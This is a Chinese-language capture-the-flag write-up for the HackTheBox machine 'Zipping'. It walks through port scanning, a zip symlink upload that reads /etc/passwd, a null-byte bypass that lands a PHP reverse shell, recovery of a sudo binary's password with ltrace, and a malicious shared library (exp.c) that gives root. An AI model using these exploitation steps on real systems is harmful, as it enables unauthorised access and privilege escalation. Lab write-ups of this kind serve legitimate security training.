Zipping

71

Machine:Linux

Level:Medium

信息收集

nmap

└─# nmap -p 22,80 -sV -sC -A 10.10.11.229
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-28 01:39 GMT
Nmap scan report for 10.10.11.229
Host is up (0.21s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.0p1 Ubuntu 1ubuntu7.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 9d:6e:ec:02:2d:0f:6a:38:60:c6:aa:ac:1e:e0:c2:84 (ECDSA)
|_  256 eb:95:11:c7:a6:fa:ad:74:ab:a2:c5:f6:a4:02:18:41 (ED25519)
80/tcp open  http    Apache httpd 2.4.54 ((Ubuntu))
|_http-title: Zipping | Watch store
|_http-server-header: Apache/2.4.54 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (96%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   196.21 ms 10.10.14.1
2   196.31 ms 10.10.11.229

验证信息

​ 在WORK WITH US界面内发现了可以上传.zip文件的地方,但里面必须是一个.pdf文件,上传文件发现成功后会返回.pdf的地址且能访问。这里尝试使用ZIP SYMLINK漏洞,将我们的.pdf文件链接到/etc/passwd

ln -s ../../../../../etc/passwd hack.pdf
zip -r --symlinks hack.zip hack.pdf

​ 上传文件并访问链接,虽然没有回显但我们查看响应体是有base64字段,解码后便得到了/etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:103:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-resolve:x:104:110:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
rektsu:x:1001:1001::/home/rektsu:/bin/bash
mysql:x:107:115:MySQL Server,,,:/nonexistent:/bin/false
_laurel:x:999:999::/var/log/laurel:/bin/false

漏洞利用

​ 我们就能通过这个漏洞获取上传文件网页源代码。其中的pathinfo()限制我们只能上传.pdf文件,文章中提示了我们可以使用空字节绕过。

<?php
if (isset($_POST['submit'])) {
    // Get the uploaded zip file
    $zipFile = $_FILES['zipFile']['tmp_name'];
    if ($_FILES["zipFile"]["size"] > 300000) {
        echo "<p>File size must be less than 300,000 bytes.</p>";
    } else {
        // Create an md5 hash of the zip file
        $fileHash = md5_file($zipFile);
        // Create a new directory for the extracted files
        $uploadDir = "uploads/$fileHash/";
        // Extract the files from the zip
        $zip = new ZipArchive;
        if ($zip->open($zipFile) === true) {
            if ($zip->count() > 1) {
                echo '<p>Please include a single PDF file in the archive.<p>';
            } else {
                // Get the name of the compressed file
                $fileName = $zip->getNameIndex(0);
                if (pathinfo($fileName, PATHINFO_EXTENSION) === "pdf") {
                    mkdir($uploadDir);
                    echo exec('7z e ' . $zipFile . ' -o' . $uploadDir . '>/dev/null');
                    echo '<p>File successfully uploaded and unzipped, a staff member will review your resume as soon as possible. Make sure it has been uploaded correctly by accessing the following path:</p><a href="' . $uploadDir . $fileName . '">' . $uploadDir . $fileName . '</a>' . '</p>';
                } else {
                    echo "<p>The unzipped file must have  a .pdf extension.</p>";
                }
            }
        } else {
            echo "Error uploading file.";
        }
    }
}
?>

反弹shell

​ 我们将php反向shell文件命名为.php .pdf压缩为.zip文件。在上传时使用burp抓包,在HEX格式中将第二个.php .pdf中空格的hex20更改为00然后放包。我们使用curl请求返回的地址( .pdf无须加上)。

listening on [any] 1234 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.11.229] 49200
Linux zipping 5.19.0-46-generic #47-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 16 13:30:11 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
 01:18:30 up 1 day,  2:29,  0 users,  load average: 1.05, 1.04, 1.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1001(rektsu) gid=1001(rektsu) groups=1001(rektsu)
/bin/sh: 0: can't access tty; job control turned off
$

权限提升

​ 查看特权指令

rektsu@zipping:/home$ sudo -l
Matching Defaults entries for rektsu on zipping:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User rektsu may run the following commands on zipping:
    (ALL) NOPASSWD: /usr/bin/stock

​ 执行提示我们需要输入密码,我们将文件传输到本机调试分析得到密码。

└─# ltrace ./stock
printf("Enter the password: ") = 20
fgets(Enter the password: 123456
"123456\n", 30, 0x7fda05721aa0)  = 0x7fff7f036ec0
strchr("123456\n", '\n') = "\n"
strcmp("123456", "[delete]") = -34
puts("Invalid password, please try aga"...Invalid password, please try again.
) = 36
+++ exited (status 1) +++

​ 输入正确密码继续调试,两个选项都是打开一个.csv文件。这似乎没有什么作用,但在输入密码后我们可以发现加载了一个库文件libcounter.且在/home/rektsu/.config/下,这是我们可以控制的,我们尝试将恶意代码放入库文件来提权。

└─# ltrace ./stock
printf("Enter the password: ") = 20
fgets(Enter the password: [delete]
"St0ckM4nager\n", 30, 0x7fd9e5511aa0) = 0x7ffd6ad8b300
strchr("St0ckM4nager\n", '\n') = "\n"
strcmp("St0ckM4nager", "[delete]") = 0
dlopen("/home/rektsu/.config/libcounter."..., 1) = 0
puts("\n================== Menu ======="...
================== Menu ==================
) = 45
puts("1) See the stock"1) See the stock
) = 17
puts("2) Edit the stock"2) Edit the stock
) = 18
puts("3) Exit the program\n"3) Exit the program
)  = 21
printf("Select an option: ") = 18
__isoc99_scanf(0x559b5587b0e0, 0x7ffd6ad8b32c, 0, 0Select an option: 1
) = 1
fopen("/root/.stock.csv", "r") = 0
__errno_location() = 0x7fd9e533b6c8
puts("File could not be opened."File could not be opened.
) = 26

printf("Select an option: ") = 18
__isoc99_scanf(0x563e677480e0, 0x7fff3216079c, 0, 0Select an option: 2
) = 1
fopen("/root/.stock.csv", "r") = 0
puts("File could not be opened."File could not be opened.
) = 26
exit(1 <no return ...>

​ 根据这篇文章我们将下面恶意代码传入/home/rektsu/.config/1

//exp.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
	setgid(0);
	setuid(0);
	system("/bin/sh");
}

​ 我们执行sudo命令,提权成功🙌

rektsu@zipping:~/.config$ gcc -shared -fPIC -nostartfiles -o libcounter.so exp.c
rektsu@zipping:~/.config$ sudo /usr/bin/stock
Enter the password: [delete]
# id
uid=0(root) gid=0(root) groups=0(root)

Footnotes

  1. 这篇文章中提供了更多利用共享库进行提权的方式案例